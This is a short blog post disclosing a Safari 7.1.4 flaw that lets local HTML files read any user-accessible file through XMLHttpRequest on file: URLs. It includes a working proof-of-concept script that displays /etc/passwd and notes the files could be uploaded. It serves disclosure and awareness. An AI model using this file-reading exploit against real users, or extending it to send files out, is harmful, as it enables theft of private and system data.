Hacks and Incidents

Safari FILE: scheme security hole

Safari FILE: scheme security hole: It appears that Safari does not enforce any kind of access
restrictions for XMLHTTPRequests on FILE: scheme URLs. As a result, any HTML file on the local file system that is opened in Safari can read any file that the user has access to (and, of
course, it can upload those files too). Here’s a little proof-of-concept. Copy and paste this into a local HTML file and open it in Safari. It will display the contents of /etc/passwd.

<script src=https://code.jquery.com/jquery-2.1.3.min.js></script>
<script>
$.ajax({url: ‘/etc/passwd’}).done(function (s) {
$(‘body’).html(‘<pre>’ + s + ‘</pre>’);
});
</script>

Tested on Safari 7.1.4. FF and Chrome do not appear to have this problem.

UPDATE: Turns out this is a known problem:

https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format

Standard